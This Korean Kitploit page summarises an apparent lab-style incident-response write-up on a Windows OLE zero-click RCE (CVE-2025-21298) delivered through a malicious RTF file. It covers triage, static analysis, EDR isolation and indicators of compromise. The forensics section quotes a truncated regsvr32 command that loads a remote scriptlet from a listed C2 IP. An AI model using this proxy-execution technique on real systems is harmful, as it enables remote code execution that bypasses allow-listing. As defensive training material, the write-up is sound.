Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Zero-Click-RCE-Incident-Response-CVE-2025-21298 — EDR 텔레메트리 및 정적 악성코드 분석을 활용하여 Critical 심각도 제로클릭 RCE 익스플로잇(CVE-2025-21298)을 기술적으로 조사하고 호스트를 격리합니다. | Kitploit
도구/GitHubGitHub/tarunbharathe/zero-click-rce-incident-response-cve-2025-21298
Indicator of Compromise (IOC) ManagementVulnerability AnalysisMalware AnalysisDigital ForensicsCommand and ControlThreat IntelligenceLearning & EducationIncident ResponseLabs & Practice

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHubtarunbharathe/zero-click-rce-incident-response-cve-2025-21298

Zero-Click-RCE-Incident-Response-CVE-2025-21298

EDR 텔레메트리 및 정적 악성코드 분석을 활용하여 Critical 심각도 제로클릭 RCE 익스플로잇(CVE-2025-21298)을 기술적으로 조사하고 호스트를 격리합니다.

저장소 보기
4개월 전아직 검토되지 않음

침해사고 대응: Windows OLE 제로클릭 RCE (CVE-2025-21298)

프로젝트 개요

이 프로젝트는 치명적(Critical) 심각도의 제로클릭 원격 코드 실행(RCE) 시도에 대한 종단 간 조사 및 차단 과정을 문서화한 것입니다. EDR 텔레메트리와 위협 인텔리전스를 활용하여 자동화된 방어 체계를 우회하고 명령 및 제어(C2) 통신을 수립한 "Living off the Land"(LotL) 공격을 식별했습니다.

주요 목표

  • 제로데이 익스플로잇에 대한 우선순위 높은 SIEM 알림 트리아지 수행.
  • 무기화된 RTF 첨부 파일에 대한 정적 분석 수행.
  • 악성 프로세스 트리 식별을 위한 엔드포인트 포렌식 수행.
  • EDR을 통한 네트워크 격리 실행으로 활성 위협 차단.

인시던트 수명주기 실행 (NIST SP 800-61)

1. 탐지 및 초기 트리아지

이벤트 ID 314: Windows OLE 제로클릭 RCE 탐지를 식별했습니다. 초기 텔레메트리에서 악성 파일 mail.rtf가 경계 방어 체계에 의해 **허용(Allowed)**된 것으로 확인되어, 워크스테이션 'Austin'에서 활성 침해가 발생했음을 나타냈습니다.

초기 알림

2. 정적 분석 및 위협 인텔리전스

VirusTotal에서 파일 해시의 평판 검사를 수행했습니다. 결과적으로 25/55 탐지율이 확인되었으며, 해당 파일이 CVE-2025-21298을 활용하는 무기화된 RTF임을 구체적으로 식별했습니다. 이 취약점은 사용자 상호작용 없이 Windows 미리 보기 창(Preview Pane)을 통한 원격 코드 실행을 허용합니다.

정적 분석

3. 엔드포인트 포렌식 (페이로드 헌팅)

침해 후(post-exploitation) 동작을 식별하기 위해 호스트 'Austin'의 EDR 터미널 기록으로 전환했습니다. 악성 "Living off the Land"(LotL) 실행을 발견했습니다:

  • 명령어: regsvr32.exe /s /u /i:http://84.38.130.118/...
  • 분석가 인사이트: 공격자는 서명된 Windows 바이너리(regsvr32.exe)를 활용해 원격 서버에서 악성 스크립틀릿(script-let)을 가져와 표준 애플리케이션 허용 목록과 기존 AV 시그니처를 우회했습니다.

엔드포인트 로그 C2 인프라 세부 정보

4. 차단 및 무력화

NIST 인시던트 대응 프레임워크에 따라 즉각적인 차단이 우선시되었습니다. 영향을 받은 호스트에 **네트워크 격리(Network Isolation)**를 실행하여 C2 통신을 종료하고 기업 네트워크 내 측면 이동(lateral movement)을 방지했습니다.

차단 조치

5. 해결 및 최종 보고

해당 인시던트는 **참양성(True Positive)**으로 종결되었습니다. 공격자 IP(84.38.130.118)와 포렌식 증거를 위협 인텔리전스 및 방화벽 팀에 문서화하여 향후 발생을 방지하고자 했습니다.

최종 해결


침해 지표 (IOCs)

주요 교훈

  • 심층 방어(Defense-in-Depth): 제로클릭 익스플로잇은 시그니처 기반 AV가 현대 위협에 충분하지 않은 이유를 증명합니다.
  • 로그 상관 분석: SIEM 알림 데이터와 EDR 터미널 로그를 성공적으로 상호 연관시켜 활성 악용을 확인했습니다.
  • EDR 숙련도: 위협 행위자의 "체류 시간(dwell time)"을 최소화하기 위한 신속한 호스트 차단을 수행했습니다.
도구 다운로드
유형값
C2 IP 주소84.38.130.118
파일 해시 (SHA256)df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184
취약점CVE-2025-21298
MITRE ATT&CKT1218.010 - Signed Binary Proxy Execution: Regsvr32